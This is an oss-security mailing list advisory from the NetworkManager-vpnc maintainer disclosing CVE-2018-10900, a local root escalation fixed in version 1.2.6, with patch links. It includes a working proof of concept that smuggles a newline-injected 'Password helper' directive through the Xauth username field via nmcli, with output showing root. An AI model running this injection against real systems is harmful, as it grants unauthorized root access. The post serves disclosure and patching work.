[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation
From: Lubomir Rintel <lkundrak () v3 ! sk>
Date: 2018-07-20 9:38:39
Message-ID: c3f99b35b65fa7d78317ca62f32046eab71596b9.camel () v3 ! sk
[Download RAW message or body]
Hi,
NetworkManager-vpnc-1.2.6 fixes a local authenticated root bug.
The bug was responsibly disclosed to us by Denis Andzakovic. Please
credit him if you issue an advisory for a product that ships the
affected code. His original advisory should be available soon at
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
CVE Number: CVE-2018-10900
Original Report (will be available soon):
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Patch:
https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4
Release Notes:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.news
Patched Version:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.tar.xz
The exploit code for QA and documentation purposes follows:
cat <<EOF >/tmp/helper
#!/bin/bash
id >/tmp/pwned
EOF
chmod +x /tmp/helper
nmcli c add con-name poc type vpn ifname '*' vpn-type vpnc \
+vpn.data "IKE DH Group = dh2" \
+vpn.data "IPSec ID = bar" \
+vpn.data "IPSec gateway = 127.0.0.1" \
+vpn.data "IPSec secret-flags = 4" \
+vpn.data "Local Port = 0" \
+vpn.data "NAT Traversal Mode = natt" \
+vpn.data "Perfect Forward Secrecy = server" \
+vpn.data "Vendor = cisco" \
+vpn.data "Xauth password-flags = 4" \
+vpn.data "Xauth username = foo$(echo; echo Password helper
/tmp/helper)" \
+vpn.data "ipsec-secret-type = save" \
+vpn.data "xauth-password-type = save"
nmcli c up poc
$ cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)
context=system_u:system_r:vpnc_t:s0
Take care,
Lubo
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic